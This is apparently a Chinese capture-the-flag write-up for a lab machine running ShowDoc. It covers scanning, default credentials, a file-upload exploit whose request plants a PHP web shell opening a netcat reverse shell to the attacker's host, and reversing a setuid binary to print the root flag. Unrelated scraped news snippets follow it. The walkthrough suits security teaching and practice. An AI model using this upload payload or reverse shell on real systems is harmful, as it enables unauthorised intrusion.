show-靶机
扫描┌──(root㉿kali)-[/home/kali1] └─# nmap -A 172.26.17.179 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-26 14:39 CST Nmap scan report for 172.26.17.179 Host is up (0.0032s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0p2 Debian 7deb13u1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.66 ((Debian)) | http-robots.txt: 1 disallowed entry |_/ | http-title: ShowDoc |_Requested resource was ./web/#/ |_http-server-header: Apache/2.4.66 (Debian) 514/tcp filtered shell Device type: WAP Running: Actiontec embedded, Linux OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel OS details: Actiontec MI424WR-GEN3I WAP Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.04 ms 192.168.245.2 2 0.04 ms 172.26.17.179 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.28 seconds结合一下信息有一个80端口然后网站的标签是showdocshowdoc是一个类似于腾讯文档的多人协同工作的一个API文档工具旨在帮助开发者编写和管理接口文档。他特别适用于前后端分离的项目能够提供美观且详细的接口方便前端开发人员使用。进来访问会有一个默认页面然后需要登录访问这个靶机的账号和密码其实开始的话我也没有啥思路然后最简单的就是上网看看这种网站有没有默认的账号密码ShowDoc 部署教程账号showdoc密码123456上来之后其实也没有什么好看的说实话。额在这里其实你基本上找不到什么漏洞硬要说的话可以先尝试dirsearch扫描┌──(root㉿kali)-[/home/kali1] └─# dirsearch -u http://172.26.17.179 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali1/reports/http_172.26.17.179/_26-06-26_14-57-19.txt Target: http://172.26.17.179/ [14:57:19] Starting: [14:57:20] 403 - 318B - /.ht_wsr.txt [14:57:20] 403 - 318B - /.htaccess.bak1 [14:57:20] 403 - 318B - /.htaccess.orig [14:57:20] 403 - 318B - /.htaccess.save [14:57:20] 403 - 318B - /.htaccess.sample [14:57:20] 403 - 318B - /.htaccess_extra [14:57:20] 403 - 318B - /.htaccess_sc [14:57:20] 403 - 318B - /.htaccess_orig [14:57:20] 403 - 318B - /.htaccessBAK [14:57:20] 403 - 318B - /.htaccessOLD [14:57:20] 403 - 318B - /.htaccessOLD2 [14:57:20] 403 - 318B - /.htm [14:57:20] 403 - 318B - /.html [14:57:20] 403 - 318B - /.htpasswd_test [14:57:20] 403 - 318B - /.htpasswds [14:57:20] 403 - 318B - /.httr-oauth [14:57:20] 403 - 318B - /.php [14:57:25] 404 - 16B - /composer.phar [14:57:25] 200 - 564B - /composer.json [14:57:26] 301 - 362B - /documentation - http://172.26.17.179/documentation/ [14:57:26] 200 - 486B - /documentation/ [14:57:26] 200 - 385B - /Dockerfile [14:57:27] 200 - 4KB - /favicon.ico [14:57:28] 301 - 356B - /install - http://172.26.17.179/install/ [14:57:28] 200 - 696B - /install/ [14:57:28] 200 - 696B - /install/index.php?upgrade/ [14:57:29] 200 - 1KB - /LICENSE.txt [14:57:31] 404 - 16B - /php-cs-fixer.phar [14:57:31] 404 - 16B - /phpunit.phar [14:57:32] 200 - 694B - /Public/ [14:57:32] 200 - 4KB - /README.md [14:57:32] 200 - 30B - /robots.txt [14:57:33] 301 - 355B - /server - http://172.26.17.179/server/ [14:57:33] 403 - 318B - /server-status [14:57:33] 403 - 318B - /server-status/ [14:57:36] 200 - 958B - /web/ Task Completed然后这里有一个compser.json文件这里面有关于showdoc的版本信息v2.8.5之后你就可以根据这个版本去网上找poc漏洞尝试了或者说因为showdoc是开源的你可以去下一下他的源代码来看看。漏洞利用https://github.com/vulhub/vulhub/tree/master/showdoc/CNVD-2020-26585POST /index.php?s/home/page/uploadImg HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q0.9,en;q0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 Connection: close Cache-Control: max-age0 Content-Type: multipart/form-data; boundary----WebKitFormBoundary0RdOKBR8AmAxfRyl Content-Length: 213 ------WebKitFormBoundary0RdOKBR8AmAxfRyl Content-Disposition: form-data; nameeditormd-image-file; filenametest.php Content-Type: text/plain ?phpinfo();? ------WebKitFormBoundary0RdOKBR8AmAxfRyl--意思的话大概就是有一个文件上传漏洞然后这个上传漏洞的话在这里好像是关于图片上传的。主要是因为一系列的路由过滤问题。PoC中的/home/page/uploadImg这个路由接口在web前端是找不到点击接口的基本上算是审计代码得到的结果。然后之后我就在想这个漏洞是咋被发现的说实话我在前端页面是真没看到有那个可以点击进去然后我就去查他的源代码源代码搜索结果在web_src源代码可以看到前端代码是否有/home/page/uploadsImg点击接口┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6] └─# grep -rni /api/page/uploadImg .|grep -v html ./web_src/src/components/common/Editormd.vue:105: imageUploadURL: DocConfig.server /api/page/uploadImg, ./web_src/src/components/page/edit/Index.vue:501: var url DocConfig.server /api/page/uploadImg ┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6] └─# grep -rni /home/page/uploadImg .|grep -v html可以看到他的前端源代码里面是真没有这/home/page/uploadImg这个接口emm不过也可能是我看不到那里漏了。POST /index.php?s/home/page/uploadImg HTTP/1.1 Host: 172.26.17.179 Accept: */* Origin: http://172.26.17.179 Cookie: PHPSESSIDplv0o3ku3kvfm94b8m4gs4tv2m; think_languagezh-CN; cookie_token68126cabb2bc16a5875aaf343f3adc83d7a84182809b7642f155010b427c63ef Referer: http://172.26.17.179/web/ Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABxK2F35Zt6rFPdp Accept-Language: zh-CN,zh;q0.9 Content-Length: 190 ------WebKitFormBoundaryABxK2F35Zt6rFPdp Content-Disposition: form-data; nameeditormd-image-file; filenamed.php Content-Type: text/plain ?php system(busybox nc 172.26.17.163 1234 -e /bin/bash); ? ------WebKitFormBoundaryABxK2F35Zt6rFPdp--HTTP/1.1 200 OK Date: Thu, 25 Jun 2026 04:30:25 GMT Server: Apache/2.4.66 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charsetutf-8 Content-Length: 92 {url:http:\/\/172.26.17.179\/Public\/Uploads\/2026-06-25\/6a3caee154dbc.php,success:1}上来之后找信息其实也没啥技巧 emm密码就藏在php代码里面这里密码在./html/server/Application/Common/Conf/config.php密码为showdoc123456两个用户一个是mooi、l1qin9两个用户密码都一样但是线索在后者l1qin9Show:~$ ls -al total 60 drwx------ 3 l1qin9 l1qin9 4096 Jun 26 03:25 . drwxr-xr-x 4 root root 4096 Apr 25 20:07 .. -rwsr-sr-x 1 root root 16632 Apr 25 22:43 auth_monitor l1qin9Show:~$ ./auth_monitor --- MAZE-SEC ACCESS MONITOR --- SYSTEM_TICK: 1782458733 CHALLENGE_STAMP: f9fb2198 ENTER ACCESS CODE:目录下有一个auth_monitor文件执行一下会出现信息这里丢到ida中分析IDA逆向主函数逆向int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ebx time_t v4; // rax char s[256]; // [rsp10h] [rbp-130h] BYREF int v7; // [rsp110h] [rbp-30h] BYREF unsigned int buf; // [rsp114h] [rbp-2Ch] BYREF FILE *stream; // [rsp118h] [rbp-28h] int v10; // [rsp120h] [rbp-20h] int fd; // [rsp124h] [rbp-1Ch] int i; // [rsp128h] [rbp-18h] unsigned int v13; // [rsp12Ch] [rbp-14h] fd open(/dev/urandom, 0, envp); //从/dev/urandom随机数源获取随机数 if ( fd 0 ) { v3 time(0LL); buf v3 ^ getpid(); } else { read(fd, buf, 4uLL); close(fd); } v13 0; for ( i 0; i 99; i ) //通过原始种子buf进行异或100次之后得到原始种子 { v13 buf % (i 1); v13 ^ **argv; } s0rand(v13); //设置随机数种子srand种子用户设置随机数生成器种子以确保每次运行程序时生成不通的随机数。依赖于一个初始种子。 v10 rand(); puts(--- MAZE-SEC ACCESS MONITOR ---); v4 time(0LL); printf(SYSTEM_TICK: %ld\n, v4); printf(CHALLENGE_STAMP: %08x\n, buf); //这里打印了原始随机数buf所以我们只需要有这个之后写一个完全一样的加密过程就能得到这道题想要的access code printf(ENTER ACCESS CODE: ); if ( (unsigned int)__isoc99_scanf(%d, v7) ! 1 ) return 1; if ( v10 v7 ) { setuid(0); setgid(0); stream fopen(/root/show.txt, r); if ( stream ) { while ( fgets(s, 256, stream) ) printf(%s, s); fclose(stream); } } else { puts(ACCESS DENIED.); } return 0; }然后这个靶机最阴的来了如果你只是看到了前面的初始种子加密过程你只猜对了一半你得金s0rand函数里看.......void s0rand() { srand(0x539u); }就是这个函数并没有将v13作为所谓的初始种子。他重新设置了一个数为0x539u这里转换成十进制就是1337u后面的表示的是数据类型unsigned那么我们在写答案代码的时候就是int main() { unsigned int buf 1337; int answer 0; srand(buf); answer rand(); printf(%d\n, answer); printf(%08x\n, answer); return 0; }最最后将结果提交即可得到答案

相关新闻

在高磨损工况里,渣浆泵的耐磨设计比品牌光环更重要

在高磨损工况里,渣浆泵的耐磨设计比品牌光环更重要

渣浆泵选错一台,停工损失远超设备本身 在矿山尾矿输送、市政污泥处理或砂石厂洗砂回水系统中,一台渣浆泵的突然失效,往往意味着整条生产线停摆。我见过太多用户因初期选型不当,反复更换叶轮、泵壳,甚至因密封泄漏导致环…

2026/7/2 3:28:41阅读更多 →
ios生命周期

ios生命周期

每个 iOS 应用都有一系列的状态和状态转换,从用户点击图标启动,到应用被系统终止。理解应用生命周期是 iOS 开发的基础,它决定了:何时初始化数据、加载 UI何时保存用户数据、释放资源如何处理前后台切换如何在系统终止应用前优雅退…

2026/7/2 3:28:41阅读更多 →
ZFX山海证券:从公开信息出发,分析风险提示与长期一致性

ZFX山海证券:从公开信息出发,分析风险提示与长期一致性

对多数外汇相关用户来说,判断平台并不需要复杂术语,关键在于信息能否被快速理解、关键提示是否容易找到、服务体验是否稳定一致。以ZFX山海证券为例,这里聚焦这些更贴近实际使用的亮点与细节。在外汇相关服务中,读者最在意的通常是…

2026/7/2 3:23:40阅读更多 →
IntelliJ IDEA远程Debug失效全解析(JVM参数+防火墙+SSL证书三重校验揭秘)

IntelliJ IDEA远程Debug失效全解析(JVM参数+防火墙+SSL证书三重校验揭秘)

更多请点击: https://intelliparadigm.com 第一章:IntelliJ IDEA远程Debug失效的典型现象与诊断起点 当 IntelliJ IDEA 连接远程 JVM 进行调试时,开发者常遭遇断点不触发、连接瞬间中断或“Connected”状态长期停滞等静默失败现象。这些表象…

2026/7/2 8:49:31阅读更多 →
猫抓资源嗅探:让网页视频下载变得如此简单

猫抓资源嗅探:让网页视频下载变得如此简单

猫抓资源嗅探:让网页视频下载变得如此简单 【免费下载链接】cat-catch 猫抓 浏览器资源嗅探扩展 / cat-catch Browser Resource Sniffing Extension 项目地址: https://gitcode.com/GitHub_Trending/ca/cat-catch 你是否曾经在网页上看到一段精彩的视频&…

2026/7/2 8:49:31阅读更多 →
高性能抖音下载器架构设计与实现原理深度解析

高性能抖音下载器架构设计与实现原理深度解析

高性能抖音下载器架构设计与实现原理深度解析 【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and browser fallback support. 抖音批量下载工具…

2026/7/2 8:49:31阅读更多 →
嵌入式条码采集系统开发与PIC18F4455应用实战

嵌入式条码采集系统开发与PIC18F4455应用实战

1. 项目背景与核心需求 在零售、仓储和物流行业中,条码扫描设备是数据采集的关键入口。传统固定式扫描器受限于安装位置和扫描角度,而手持设备又存在操作效率低下的问题。LV30系列条码扫描器因其卓越的多介质适应能力(可读取纸质、屏幕、曲面…

2026/7/2 8:49:31阅读更多 →
PandaGPT:端到端多模态指令遵循的工程落地实践

PandaGPT:端到端多模态指令遵循的工程落地实践

1. 项目概述:一个真正“多模态理解”的起点,不是噱头而是工程落地的信号最近在几个AI模型评测社区刷到一条消息:“Meet PandaGPT: The New Instruction Following Model that can Both See and Hear.”——标题里没提“text-to-text”、没写“…

2026/7/2 8:49:31阅读更多 →
Ubuntu 部署Harbor

Ubuntu 部署Harbor

arbor 是由 VMware 开源的一款云原生制品仓库,Harbor 的核心功能是存储和管理 Artifact。Harbor 允许用户用命令行工具对容器镜像及其他 Artifact 进行推送和拉取,并提供了图形管理界面帮助用户查看和管理这些 Artifact。在 Harbor 2.0 版本中&#xff0…

2026/7/2 8:44:31阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/7/1 4:42:14阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/7/1 5:19:01阅读更多 →
塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧

塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧

塞尔达传说旷野之息存档修改器:3分钟掌握海拉鲁世界自由定制技巧 【免费下载链接】BOTW-Save-Editor-GUI A Work in Progress Save Editor for BOTW 项目地址: https://gitcode.com/gh_mirrors/bo/BOTW-Save-Editor-GUI 想在《塞尔达传说:旷野之息…

2026/7/2 0:03:01阅读更多 →
告别 AccessKey:多云平台 CLI OAuth 免密认证完全指南

告别 AccessKey:多云平台 CLI OAuth 免密认证完全指南

在本地开发环境使用云厂商 CLI 时,传统的 AccessKey(AK)方式需要手动创建、下载和保管密钥,不仅繁琐,还存在泄漏风险。其实,主流云平台都已提供基于 OAuth 2.0 的免密认证方案,让开发者可以通过浏览器登录一次性完成授权,CLI 自动管理临时凭证的刷新,兼顾了便利与安全…

2026/7/2 0:03:01阅读更多 →
基于13DOF传感器与PIC32MZ的高精度嵌入式导航系统设计

基于13DOF传感器与PIC32MZ的高精度嵌入式导航系统设计

1. 项目背景与核心价值在嵌入式系统开发领域,高精度定位与导航一直是极具挑战性的技术方向。传统方案往往面临成本、精度和实时性难以兼顾的困境。这个项目通过13DOF(13自由度)传感器组合与PIC32MZ2048EFH100高性能MCU的协同工作,…

2026/7/2 0:03:01阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/2 0:33:58阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/2 1:32:11阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/2 1:50:13阅读更多 →